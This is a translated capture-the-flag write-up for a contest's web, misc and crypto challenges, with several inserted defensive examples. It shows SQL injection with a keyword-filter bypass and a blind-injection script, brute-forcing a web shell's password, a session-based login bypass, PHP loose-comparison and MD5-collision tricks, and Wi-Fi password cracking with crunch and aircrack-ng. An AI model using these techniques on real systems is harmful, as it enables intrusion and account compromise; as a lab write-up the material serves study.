Web

Download Download

Much like a bugku challenge I have seen before.

Hint: flag.php
[image: AInpfH.png]

Then download the file: http://120.79.1.69:10002/?file=flag.php
This returns the file:

<?php
header('Content-Type: text/html; charset=utf-8'); // page encoding
function encrypt($data, $key) {
    $key = md5 ( $key );
    $x = 0;
    $len = strlen ( $data );
    $l = strlen ( $key );
    for($i = 0; $i < $len; $i ++) {
        if ($x == $l) {
            $x = 0;
        }
        $char .= $key {$x};
        $x ++;
    }
    for($i = 0; $i < $len; $i ++) {
        $str .= chr ( ord ( $data {$i} ) + (ord ( $char {$i} )) % 256 );
    }
    return base64_encode ( $str );
}

function decrypt($data, $key) {
    $key = md5 ( $key );
    $x = 0;
    $data = base64_decode ( $data );
    $len = strlen ( $data );
    $l = strlen ( $key );
    for($i = 0; $i < $len; $i ++) {
        if ($x == $l) {
            $x = 0;
        }
        $char .= substr ( $key, $x, 1 );
        $x ++;
    }
    for($i = 0; $i < $len; $i ++) {
        if (ord ( substr ( $data, $i, 1 ) ) < ord ( substr ( $char, $i, 1 ) )) {
            $str .= chr ( (ord ( substr ( $data, $i, 1 ) ) + 256) - ord ( substr ( $char, $i, 1 ) ) );
        } else {
            $str .= chr ( ord ( substr ( $data, $i, 1 ) ) - ord ( substr ( $char, $i, 1 ) ) );
        }
    }
    return $str;
}

$key="MyCTF";
$flag="o6lziae0xtaqoqCtmWqcaZuZfrd5pbI=";//encrypt($flag,$key)
?>

The file gives both the encryption and the decryption function.
Just add echo decrypt($flag,$key);
and run it locally to decrypt the flag.

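Web Sign-in

Inspecting the page turned up nothing.
Clicking "flag is here" shows:

[image: AIn5ut.png]
Capturing the request with Burp Suite reveals the flag:
[image: AIuCUU.png]

Base64-decode it to get the flag.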

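A Tortuous Life

Testing shows that an injection exists.

[image: AIuaa8.png]

Keywords such as or, select and union are filtered, but writing each keyword doubled bypasses the filter.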
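
Why doubling a keyword defeats this kind of filter, and what fixes it, as an added example (not code from the challenge or from the original write-up). `strip_once` is an assumed model of a single-pass keyword filter, and the SQLite table, user and input are constructed.

```python
import re
import sqlite3

# Assumed blocklist, modelled on the keywords the write-up says were filtered.
_BLOCKED = re.compile(r"select|union|or", re.IGNORECASE)


def strip_once(value):
    """Weak filter (assumed shape): delete blocked keywords in a single pass."""
    return _BLOCKED.sub("", value)


def make_db():
    """Constructed in-memory table standing in for the challenge's admin table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('alice', 'constructed-secret')")
    return db


def lookup_vulnerable(db, username):
    """Filter, then concatenate: whatever survives the filter still becomes SQL syntax."""
    sql = "SELECT username FROM admin WHERE username = '%s'" % strip_once(username)
    return [row[0] for row in db.execute(sql)]


def lookup_hardened(db, username):
    """Bound parameter: the input is only ever a value, so no keyword filter is needed."""
    sql = "SELECT username FROM admin WHERE username = ?"
    return [row[0] for row in db.execute(sql, (username,))]


if __name__ == "__main__":
    db = make_db()
    doubled = "nobody' oorr '1'='1"      # constructed input with a doubled keyword
    # Removing the inner keyword glues the outer halves back into the keyword.
    print(strip_once("selselectect"), strip_once("infoorrmation_schema"))
    # The filter also corrupts legitimate data that happens to contain a keyword.
    print(strip_once("victor"))
    print(lookup_vulnerable(db, doubled))   # row returned for a user that does not exist
    print(lookup_hardened(db, doubled))     # no row: the quote is just part of the value
```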

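The password dumped through the injection: ajahas&&*44askldajaj

Then comes the captcha (soul-crushing). During the contest the page contained lots of garbled characters and I never got it working (annoyed). After the contest, running a script solved it.

The script: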

#coding=utf-8
import requests
import re
url='http://120.79.1.69:10005/?check'
header={
    'Host': '120.79.1.69:8887',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://120.79.1.69:8887/web5/index.php',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '39',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=5g0haq5bfil2eu3lejhffs9bv3',
    'Upgrade-Insecure-Requests': '1'
}
# flag =""
# blind injection to extract the password
# for x in range(1,50):
#     for j in range(27,128):
#         # playload = "0' || (ascii(substr(database(),"+str(x)+",1))="+str(j)+") ||'0"  #xiaowei
#         # playload = "0' || (ascii(substr((selselectect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/ where/**/table_schema/**/like/**/ database()),"+str(x)+",1))="+str(j)+") ||'0"  #admin
#         # playload = "0' || (ascii(substr((selselectect/**/ group_concat(column_name)/**/ from /**/infoorrmation_schema.columns/**/ where/**/ table_name/**/=/**/'admin'),"+str(x)+",1))="+str(j)+") ||'0" #id,username,password
#         playload = "0' || (ascii(substr((seleselectct/*a*/username/*a*/from/*a*/ admin),"+str(x)+",1))="+str(j)+") ||'0" #ajahas&&*44askldajaj
#         # print playload
#         # exit()
#         # playload = string_reverse(playload)
#         # print playload
#         pwd={
#             'username':playload
#         }
#         r=requests.post(url,headers=header,data=pwd)
#         # print url+playload
#         # print r.text
#         # exit()
#         if j==127:
#             break
#         if "goodboy_g-60Hellowor" in r.text:
#             flag += str(chr(j))
#             print flag
#             break



# s=requests.session()
# res=s.get(url)
# # print res.text.encode('utf-8')
# ans=re.findall(ur"<div class='rep'>.*X.*X.*/.*X.*</div>",res.text.encode('utf-8'))
# # print ans
# a=re.sub('\xc3\xaf\xc2\xbc\xc2\x89',')',ans[0])
# b=re.sub('(','(',a)
# b=re.sub('(','(',a)
# b=re.sub(')',')',b)
# c=re.sub('X','*',b)
# d=re.sub("<div class='rep'>",'',c)
# e=re.sub('</div>','',d)

# print e
# f=str(int(eval(e)))
# print f
# # f=f[0:len(f)-1]
# # print f
# data={
#     'username':'goodboy_g-60Hellowoorr',
#     'password':'ajahas&&*44askldajaj',
#     'code':f
# }
# proxies = {
#     'http':'http://127.0.0.1:8080'
# }
# an=s.post(url,headers=header,data=data,proxies=proxies)
# print an.text.encode('utf-8')
# # print an.headers
# print data
# # url1='http://120.79.1.69:8887/web5/index.php'
# # bn=s.get(url1)
# # print bn.text

for x in xrange(1,90000000):
    s=requests.session()
    res=s.get(url)
    # print res.text.encode('utf-8')
    ans=re.findall(ur"<div class='rep'>.*X.*X.*/.*X.*</div>",res.text.encode('utf-8'))
    # print ans
    # normalise the full-width parentheses in the captcha to ASCII before evaluating it
    a=re.sub('\xc3\xaf\xc2\xbc\xc2\x89',')',ans[0])
    b=a.replace('(','(')
    b=b.replace(')',')')
    c=re.sub('X','*',b)
    d=re.sub("<div class='rep'>",'',c)
    e=re.sub('</div>','',d)
    print e
    f=str(int(eval(e)))
    print f
    # f=f[0:len(f)-1]
    # print f
    data={
        'username':'goodboy_g-60Hellowoorr',
        'password':'ajahas&&*44askldajaj',
        'code':f
    }
    proxies = {
        'http':'http://127.0.0.1:8080'
    }
    an=s.post(url,data=data)
    # print an.text.encode('utf-8')
    # print an.headers
    print data
    # url1='http://120.79.1.69:8887/web5/index.php'
    # bn=s.get(url1)
    # print bn.text
    if "验证码正确" in an.text.encode('utf-8'):
        print an.text.encode('utf-8')
        break

After logging in, the page shows:
[image: AIKQe0.png]

Download the archive,
[image: AIKcSH.png]
open it with the password %^$%&sss88ioiern.gdsgj and look at Form1.txt

Private Function getPassword(ByVal str As String) As String


    Dim reString As String

    Dim i As Integer
    i = 1


    While (i <= Len(str))

     reString = reString & Mid(str, i, 1)
     i = i + (i Mod 5)


    Wend


    getPassword = reString

End Function



Private Sub Command1_Click()

   Dim Dictionary As String

   Dictionary = "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"

   Dim password As String

   password = getPassword(Dictionary)


   Dim psw As String

   psw = Text1.Text


   If (psw = password) Then

    MsgBox "The password is correct!", vbOKOnly, "密码正确"

    Text1.Text = "Password for next pass : " & getPassword(password)

   Else

    MsgBox "PasswordFail!", vbOKOnly, "密码错误"


   End If



End Sub

This gives the method for decrypting flag.zip.
Write a script:

#coding=utf-8

def getpassword(s):
    i=1
    password=''
    while i<=len(s):
        password+=s[i-1:i]
        i=i+i%5
    return password


s='VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU='
print getpassword(getpassword(s))

This yields the password for extracting flag.zip:
VmH0wW3DZalBnmmSalV1SYSGRr1r3jVYcFrHWkUUlhljkFzCbXaEKyaVJymT1FlVTVskVWhGtonaGU2WWGhVXYol1WVI1F2odFuk
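However (mmp), extracting with 360 kept reporting a wrong password.
In the end it turned out that extracting with winzar works:
This gives flag.png
which turns out to be
[image: AIMFXR.png]
Change the extension to txt to get the flag.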
flag:flag{Good luck!}

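This Site Has Been Hacked

This turns out to be an original bugku challenge.

Scanning the directories with 御剑 (Yujian) finds:
http://120.79.1.69:10004/shell.php
Visiting it shows
[image: AIMfgJ.png]
My guess was a weak password: capturing the request with Burp Suite and brute-forcing gives the password hack
which yields the flag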
flag:jactf{DWDASFASCASFAFASFNKAS}

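Guess the Password

The source code shows that the password is two current timestamps concatenated. We could build a dictionary of all upcoming timestamps and brute-force with burpsuite, but building that dictionary is rather tedious.
[image: AI1K9U.png]
Instead, we can change the PHPSESSID in the cookie to anything (I simply deleted it entirely) so that the server cannot find the corresponding session. Then $_SESSION['pwd'] is empty, and if we also submit an empty pwd parameter the two are equal.

Finally, we get the flag.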

audit

Code audit

<?php
highlight_file(__FILE__);
include('flag.php');
$str1 = @$_GET['str1'];
$str2 = @$_GET['str2'];
$str3 = @$_GET['str3'];
$str4 = @$_GET['str4'];
$str5 = (string)@$_POST['str5'];
$str6 = (string)@$_POST['str6'];
$str7 = (string)@$_POST['str7'];
if( $str1 == $str2 ){
    die('str1 OR Sstr2 no no no');
}
if( md5($str1) != md5($str2) ){
    die('step 1 fail');
}
if( $str3 == $str4 ){
    die('str3 OR str4 no no no');
}
if ( md5($str3) !== md5($str4)){
    die('step 2 fail');
}
if( $str5 == $str6 || $str5 == $str7 || $str6 == $str7 ){
    die('str5 OR str6 OR str7 no no no');
}
if (md5($str5) !== md5($str6) || md5($str6) !== md5($str7) || md5($str5) !== md5($str7)){
    die('step 3 fail');
}

if(!($_POST['a']) and !($_POST['b']))
{
    echo "come on!";
    die();
}
$a = $_POST['a'];
$b = $_POST['b'];
$m = $_GET['m'];
$n = $_GET['n'];

if (!(ctype_upper($a)) || !(is_numeric($b)) || (strlen($b) > 6)) 
{
    echo "a OR b fail!";
    die();
}

if ((strlen($m) > 4) || (strlen($n) > 4)) 
{
    echo "m OR n fail";
    die();
}

$str8 = hash('md5', $a, false);
$str9 = strtr(hash('md5', $b, false), $m, $n);

echo "<p>str8 : $str8</p>";
echo "<p>str9 : $str9</p>";

if (($str8 == $str9) && !($a === $b) && (strlen($b) === 6))
{
    echo "You're great,give you flag:";
    echo $flag;
} 

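The first two steps are easy to bypass.
Step one is bypassed with loose typing or with arrays.
Step two is bypassed with arrays.
Step three casts the inputs with (string), so arrays no longer work.
The only way is a real MD5 collision: the three submitted values must differ from each other while their MD5 hashes are equal.
The organizers recommended an MD5 collision tool here:
link
The tool can generate any number of files with the same MD5, which gets past step three.
(Python 3 environment)
To use the tool, first install libboost-all-dev, then run python3 gen_coll_test.py; it generates a large number of files.
Now the last step.
We need to pass the parameters a, b, m and n: $a must be uppercase letters, $b must be numeric with a length of 6, and $m and $n must be shorter than 4.
$str8 is the hash of $a; $str9 is the hash of $b with the characters of $m replaced by those of $n; and $str8 == $str9 is required. This is loose typing again.

The hash of $a has to start with 0e. If the hash of $b also started with 0e the comparison would hold, but that cannot be satisfied with a length of 6. There is still the replacement, though, so we only need to replace the non-digits after 0e with digits.
The values found:
[image: AI826g.png]
Submitting them gives the flag:
[image: AIGP1O.png]
Full script: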

import hashlib
import requests
def md5(str):
  p= hashlib.md5(str).hexdigest()
  return p


for i in range(1,999999):
  if md5(str(i))[0:2] == '0e':
    if 'e' not in md5(str(i))[2:]:
      if 'f' not in md5(str(i))[2:]:
        if 'a' not in md5(str(i))[2:]:
          print i



url='http://120.79.1.69:10007/?str1[]=1&str2[]=2&str3[]=3&str4[]=4&m=bcd&n=123'
str5=open('md5/out_test_003.txt','rb').read()
str6=open('md5/out_test_001.txt','rb').read()
str7=open('md5/out_test_002.txt','rb').read()
print str5
data= {
  'str5':str5,
  'str6':str6,
  'str7':str7,
  'a':'QNKCDZO',
  'b':'259987'
}


res= requests.post(url=url,data=data)
print res.content
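
The final comparison above, modelled in Python as an added example (not the challenge's code and not part of the original write-up). `php_loose_eq` is a simplified stand-in for PHP's `==` on two strings and covers only this case; `passes_strict_check` shows the comparison a defender would use instead (`hash_equals` or `===` in PHP).

```python
import hashlib
import hmac
import re

# PHP-style numeric string: optional sign, digits with optional fraction, optional exponent.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(left, right):
    """Simplified model of `==` on two strings: numeric strings compare as numbers."""
    if _NUMERIC.match(left) and _NUMERIC.match(right):
        return float(left) == float(right)      # "0e..." is 0 * 10**n, i.e. 0.0
    return left == right


def strtr_chars(text, src, dst):
    """strtr($text, $src, $dst) with equal-length arguments: per-character translation."""
    return text.translate(str.maketrans(src, dst))


def md5_hex(value):
    return hashlib.md5(value.encode()).hexdigest()


def passes_weak_check(a, b, m, n):
    """The page's last test: md5($a) == strtr(md5($b), $m, $n), with loose comparison."""
    return php_loose_eq(md5_hex(a), strtr_chars(md5_hex(b), m, n))


def passes_strict_check(a, b, m, n):
    """Hardened form: the two hex strings must be identical, compared in constant time."""
    return hmac.compare_digest(md5_hex(a), strtr_chars(md5_hex(b), m, n))


if __name__ == "__main__":
    # Values taken from the write-up's script.
    a, b, m, n = "QNKCDZO", "259987", "bcd", "123"
    print(md5_hex(a))
    print(strtr_chars(md5_hex(b), m, n))
    print("loose :", passes_weak_check(a, b, m, n))
    print("strict:", passes_strict_check(a, b, m, n))
```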

not_easy

This is a create_function() code-injection challenge.

For details, see my other article: create_function code injection

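Misc

Sign-in

Just follow the official WeChat account.

Really Not an Image

WinHex suggests that a compressed archive is hidden inside.
Running binwalk shows:
[image: AINdo9.png]
(dead on the spot)

The correct method (the official one):

Running binwalk shows that there is a zip:

[image: AIsdoT.png]
But carving with foremost produces no zip,
because binwalk cannot extract it properly.

My guess was a file-header problem.
zip HEX 50 4B 03 04 14 00 00
So search for 14000000
and find:
[image: AIsoSH.png]
We can see that 504b0304 has been replaced with 6a613636, i.e. ja66.
Restoring the header gives subject.zip, which has a password. I guessed ja66, and it was.
After extraction there are 32 folders, each containing one txt file that holds a single character.
Extracting them gives: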
amFjdGZ7NjRzZTY0XzFzXzUwX2MwMDF9
Base64-decode it to get the flag.
Script:

import base64
flag=''
for x in xrange(0,32):
    path='subject/'+str(x)+'/'+str(x)+'.txt'
    f=open(path,'r')
    flag+=f.read()
print len(flag)
print flag
print base64.b64decode(flag)

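Doubting Life

There are three files.
ctf1.zip has a password; brute-forcing finds that it is password.
After opening it, base64-decode and then Unicode-decode the content to get:
flag{hacker
Next, ctf2.jpg: a hex view shows a hidden zip, and foremost extracts the archive. It has a password that cannot be brute-forced. Inspecting the archive in WinHex shows that it uses global pseudo-encryption.
[image: ATYBkj.png]
Change 01 00 to 00 00. Opening the archive reveals Ook encoding.
Decoding gives
[image: ATNBzq.png]
Then base58-decode it:
result: misc
Next, ctf3.jpg:
scanning the code gives: 12580}
Putting the pieces together gives the flag.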
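
How to tell the pseudo-encryption seen in ctf2's archive from real encryption, and undo it, as an added example (not part of the original write-up): an entry whose encryption bit is set but whose stored bytes still inflate and match the CRC-32 was never encrypted. The sample archive is constructed in memory and all function names are this example's own.

```python
import io
import struct
import zipfile
import zlib


def entries(data):
    """Walk the central directory; yield flag offsets and each entry's stored bytes."""
    eocd = data.rfind(b"PK\x05\x06")
    count, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
    for _ in range(count):
        flags, method = struct.unpack_from("<HH", data, pos + 8)
        crc, csize = struct.unpack_from("<II", data, pos + 16)
        nlen, xlen, clen = struct.unpack_from("<HHH", data, pos + 28)
        lfh = struct.unpack_from("<I", data, pos + 42)[0]
        lnlen, lxlen = struct.unpack_from("<HH", data, lfh + 26)
        start = lfh + 30 + lnlen + lxlen
        yield {"name": bytes(data[pos + 46:pos + 46 + nlen]).decode("cp437"),
               "method": method, "crc": crc,
               "cd_flag_pos": pos + 8, "lfh_flag_pos": lfh + 6,
               "flagged": bool((flags | data[lfh + 6]) & 1),
               "raw": bytes(data[start:start + csize])}
        pos += 46 + nlen + xlen + clen


def is_plaintext(entry):
    """True when the stored bytes decode and match the CRC-32 without any key."""
    raw = entry["raw"]
    try:
        body = zlib.decompress(raw, -15) if entry["method"] == 8 else raw
    except zlib.error:
        return False
    return zlib.crc32(body) == entry["crc"]


def find_pseudo_encrypted(data):
    """Names of entries whose encryption bit is set although the data is not encrypted."""
    return [e["name"] for e in entries(data) if e["flagged"] and is_plaintext(e)]


def clear_fake_flags(data):
    """Reset bit 0 (01 00 -> 00 00) in both headers of every pseudo-encrypted entry."""
    fixed = bytearray(data)
    for e in entries(data):
        if e["flagged"] and is_plaintext(e):
            fixed[e["cd_flag_pos"]] &= 0xFE
            fixed[e["lfh_flag_pos"]] &= 0xFE
    return bytes(fixed)


def build_sample():
    """Constructed archive: one deflated entry with the encryption bit forced on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("note.txt", b"constructed sample, not challenge data\n" * 3)
    data = bytearray(buf.getvalue())
    for e in list(entries(data)):
        data[e["cd_flag_pos"]] |= 1
        data[e["lfh_flag_pos"]] |= 1
    return bytes(data)


if __name__ == "__main__":
    sample = build_sample()
    print(find_pseudo_encrypted(sample))
    fixed = clear_fake_flags(sample)
    print(zipfile.ZipFile(io.BytesIO(fixed)).read("note.txt"))
```

A genuinely encrypted entry fails the inflate or CRC-32 check, so `clear_fake_flags` leaves it untouched.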

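Damned Tenderness

"该死" (damned) sounds like "guess", which points to the steganography tool OutGuess, a general-purpose steganography tool that can insert hidden information into the redundant bits of a data source.

Downloading and installing the tool

In a Kali terminal, run: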

git clone https://github.com/crorvick/outguess

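The package is downloaded into a folder. Double-click to open the folder, right-click an empty area and open a terminal there.

Then run the following command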

./configure && make && make install

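Right-click the image to view its properties; the comment field contains guess
[image: AII0kd.png]
This is the password to use with the tool.

In Kali, run: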

outguess -k "guess" -r flag.jpg ctf.txt

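Here guess is the password, -r is the option that extracts (decrypts) the message, and ctf.txt is the output file

[image: AIIW7Q.png]
Open ctf.txt to get the flag.

[image: AIIHXT.png]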

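What Did You Do to My Website

This is a traffic-analysis challenge. Analyze it in Wireshark: follow the streams and look at the HTTP traffic.
[image: AIqGpd.png]
This reveals the encoding scheme: the output of exec is compressed with gzcompress() and then base64-encoded for transmission. Following the streams,
the last POST request shows that cat /flag.txt was executed,
[image: AILCjI.png]
together with the encoded string of the command's return value, which can be decoded directly.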

<?php
echo gzuncompress(base64_decode('eJxLy0lMrw6NTzPMS4n3TVWsBQAz4wXi'));
?>

This gives the flag.
[image: AILg8H.png]

What Is This Thing


Searching shows that the challenge text is Quoted-printable encoded. Decoding gives:

佛曰:梵僧奢楞奢吉若奢不帝冥夜是缽朋缽真特俱上罰能皤室阿諳明一切呐除梵姪缽婆呐亦參侄呼皤世哆特哆故勝諳爍謹智皤參孕逝諳謹漫死即侄除哆逝侄是奢喝礙豆諳楞無俱者哆度者。諳真冥訶侄勝竟藝奢不伊皤謹涅孕無他羅大得闍哆喝耶僧無羯滅除利缽多梵夷梵栗缽者孕諳盧皤三罰寫老梵耶室帝梵寫羯數梵盡侄栗侄藐俱世諳上諳姪數室婆罰槃奢訶哆多逝藐道梵楞梵南侄迦呐知朋楞侄離呐沙呐智遮大室神冥輸殿缽槃梵怛恐舍知皤迦奢般諳爍寫漫伊俱栗哆他亦缽楞怛冥呼切俱菩舍呐實栗奢波摩諳道缽瑟哆實皤爍勝薩罰諸奢般諦罰明缽諦尼哆楞佛俱醯諳滅度哆所槃姪麼所恐諳他侄寫瑟侄所得隸哆闍呐提盧冥咒奢曰呐沙怯般南怯地缽喝冥想呐盧罰謹呼跋缽上娑諦死侄迦

Then apply Buddhist-scripture decoding:

公正友善自由公正民主公正和谐法治自由公正公正法治友善平等公正爱国公正平等法治爱国公正敬业公正友善爱国平等诚信平等法治敬业法治平等公正公正公正诚信平等平等友善敬业法治民主法治富强法治友善法治

Then apply core-values decoding:
This gives the flag: jactf{hexin_yufo_qp}

so_easy

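The download is an exe file (I almost gave up...), and it would not run. Opening it in WinHex shows that it does not look like an exe; it looks like a txt file. So change the extension.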

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

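Opening it, the content looks like base64, but base64 decoding fails. Base58 decoding then succeeds,
giving:
[image: AoFWtA.png]
This turns out to be the base64 encoding of an image, so restore the image.
[image: AoFb7Q.png]
That gives a QR code; scanning it gives the flag.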
flag:jactf{base58_base64_flag_very_easy}

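Little Comb, You Are the Only One I Love

Challenge:
Xu Xinhen is always thinking of Little Comb (小梳子), so he set his wifi password to her mobile number. The first six digits are 138364. Crack the wifi password; format jactf{}

We can build our own dictionary and brute-force directly.
Kali's dictionary generator crunch can build the dictionary. The command is: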

crunch 11 11 -t 138364%%%%% -o /root/桌面/test.txt

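(Explanation: 11 11 means the minimum and maximum length of each entry are both 11, % stands for a digit, and -o is the output path)
[image: AoAp8I.png]
The dictionary is now ready.
Next comes the brute-force.
Run the command: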

aircrack-ng -w /root/桌面/test.txt Tenda_D07D90-01.cap

[image: AoACxP.png]
Enter the corresponding index, 12, and the cracking starts.
[image: AoAKx0.png]
This gives the phone number.
So the flag is: jactf{13836458932}

Crypto

Sign-in

6A616374667B6865785F69735F656173797D

Convert the hexadecimal to a string.

#coding:utf-8
import binascii
print binascii.a2b_hex("6A616374667B6865785F69735F656173797D")

This gives the flag.

The Base Family: Three Heroes Battle the Demons!

The title tells us it is base(16+32+64)
The script:

#coding:utf-8
import base64
flag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
while 1:
  try:
    flag= base64.b16decode(flag)
  except:
    print flag
    break
  try:
    flag= base64.b32decode(flag)
  except:
    print flag
    break
  try:
    flag= base64.b64decode(flag)
  except:
    print flag
    break

This gives the flag: jactf{4(b64_32_16)}

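Founder of the Roman Empire

This is a variant Caesar cipher (much like a challenge from the 嘉伟思杯 contest).

The first five ciphertext characters h^_o` have the ASCII codes 104 94 95 111 96
and jactf corresponds to the ASCII codes 106 97 99 116 102. So the encryption subtracts 2 from the ASCII code of the first character, 3 from the second, 4 from the third, and so on.
The script: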

str = "h^_o`[pZi^i`"
#106 97 99 116 102 
#104 94 95 111 96 91 112 90 105 94 105 96 32 32 32 32 32

flag = ""
j=2

for i in range(len(str)):
    flag += chr(ord(str[i])+j)
    j = j+1

print flag

Result: jactfbxcsium
Written as jactf{bxcsium}, this is the flag.

Top-Secret Intelligence

First base64-decode to get:

[264032310L, 4950637341L, 4189137235L, 3503675906L, 1193272L, 374530968L, 5189281531L, 2514200272L, 4454305581L, 641078597L, 4395931659L, 2716426599L, 437539194L, 3448013596L, 307207209L, 4750820606L, 3250407993L, 853905209L, 2109791159L, 2716426599L, 2107899554L, 4395931659L, 2794384598L, 2109791159L, 5297779094L, 1460874286L, 1460874286L, 794931679L, 794931679L, 5447051622L, 853905209L, 3198340218L, 1193272L, 1912323101L, 5297779094L, 307207209L, 3231572608L, 3198340218L, 5189281531L, 527889548L, 4950637341L, 2839366805L, 1116457354L, 527889548L, 5297779094L, 3250407993L, 4454305581L, 6510392L, 3250407993L, 1460874286L, 1059035129L, 3200359612L, 853905209L, 307207209L, 156779101L, 2145301328L, 527889548L, 1059035129L, 5468025072L, 3448013596L, 2107899554L, 4189137235L, 3503675906L, 2653436113L]

Then decrypt with RSA

#coding=utf-8
import rsa
import sys
import gmpy2


marr= [264032310L, 4950637341L, 4189137235L, 3503675906L, 1193272L, 374530968L, 5189281531L, 2514200272L, 4454305581L, 641078597L, 4395931659L, 2716426599L, 437539194L, 3448013596L, 307207209L, 4750820606L, 3250407993L, 853905209L, 2109791159L, 2716426599L, 2107899554L, 4395931659L, 2794384598L, 2109791159L, 5297779094L, 1460874286L, 1460874286L, 794931679L, 794931679L, 5447051622L, 853905209L, 3198340218L, 1193272L, 1912323101L, 5297779094L, 307207209L, 3231572608L, 3198340218L, 5189281531L, 527889548L, 4950637341L, 2839366805L, 1116457354L, 527889548L, 5297779094L, 3250407993L, 4454305581L, 6510392L, 3250407993L, 1460874286L, 1059035129L, 3200359612L, 853905209L, 307207209L, 156779101L, 2145301328L, 527889548L, 1059035129L, 5468025072L, 3448013596L, 2107899554L, 4189137235L, 3503675906L, 2653436113L]
p = 54163 # (p and q are the integers obtained by factoring n)
q = 101929
n = 5520780427
e = 134257
d = int(gmpy2.invert(e , (p-1) * (q-1)))
print d
#message='U2FsdGVkX1/8DKBmhvO87/SOLaawwxvAdHLB9AV62nC6LhXzhatpvBcg6tlK7Fs5'
# RSA encryption
# for i in message:
#   print(ord(i))
#   print(pow(ord(i),e,n))
#   marr.append(pow(ord(i),e,n))
# print(marr)


# RSA decryption
result=""
for j in marr:
  # print(j)
  result+= chr(pow(j,d,n))
print(result)
print("success!!!")

Result:
U2FsdGVkX1/8DKBmhvO87/SOLaawwxvAdHLB9AV62nC6LhXzhatpvBcg6tlK7Fs5

Then DES-decrypt it to get the flag.
flag:jactf{So_easy_RSA_and_DES}

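Bayes

First, base64-decode the codebook to get the plaintext space.

Then look at the encryption script: the line “where= ((where * a) + b) mod x;” shows that it is an affine cipher.
Write a brute-force script directly: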

#include <iostream>
#include <string>

using namespace std;
int gcd(int m, int n);
int init_gcd(int m, int n);
int des_find(string p, int m);

#define PSIZE 65   // size of the cipher alphabet


int main()
{
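  string P("zQWERTYUIOPxcvbnmasdfASDFGHJKLghjkl_qwZXCVBNMert{yuiop}0123498765"), M("gf9C{YQ34KHN3sOwhCz3RzH3CKj3Ndpm1Bt7");   // plaintext space and the known ciphertext
  string C;  // holds the decrypted plaintext


  int i = 2;   // try every multiplier that is coprime with PSIZE
  int a1;  // holds the modular inverse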

  for (i; i < PSIZE; i++)
  {
    if (gcd(i, PSIZE) == 1)
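    {  // i is coprime with PSIZE here
      /*** compute the inverse of this i ***/
      a1 = init_gcd(i, PSIZE);


      for (int j = 0; j < PSIZE; j++)   // iterate over b
      {
        cout << "此时:a=" << i << " b=" << j << " a的逆元为:" << a1 << "   \"";
        for (int k = 0; k < M.length(); k++) {     // each Chinese character takes two bytes, so it needs two array slots
          int where = des_find(P, M[k]);   // position of the ciphertext character in the plaintext space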
          where = ((where - j)*a1) % PSIZE;
          if (where < 0) {
            where += PSIZE;
          }

          cout << P[where];
        }
        cout << "\"" << endl;
      }

    }
  }

  return 0;
}

int gcd(int b, int a)    // greatest common divisor, used for the coprimality test
{
  int temp;
  if (a < b)  // order the operands
  {
    temp = a;
    a = b;
    b = temp;
  }
  if (b == 0) return a;
  else return gcd(b, a%b);  // recurse
}

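int init_gcd(int m, int n)   // modular inverse of m mod n, found by brute-force search
{
  for (int i = 1; i < n; i++)
  {
    if ((m*i) % n == 1)
    {
      return i;
    }
  }
  return 0;   // no inverse exists (m and n are not coprime)
}

int des_find(string p, int m)   // position-matching function
{
  for (int i = 0; i < p.length(); i ++) {
    //cout<<p[i]<<p[i+1]<<endl;
    if (m == p[i]) {
      return  i;
    }
  }
  return -1;   // character is not in the alphabet
}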

This gives the flag:
[image: ATn74O.png]

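Digits and Underscores That Can't Run

URL-decode first, then base16-decode, then base64-decode. The result:
NEGXJ{48_ter_119_xsoirw_teww}
It looks very much like a flag,
but it is not. The ASCII values of the flag's letters have been increased by four (found by comparing NEGXJ with JACTF).
So write a script: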

#coding=utf-8

str='NEGXJ{48_ter_119_xsoirw_teww}'
flag=''
for x in str:
    # print x
    if x.isalpha():  # check whether the character is a letter
        flag+=chr(ord(x)-4)
    else:
        flag+=x
print flag

This gives the flag.
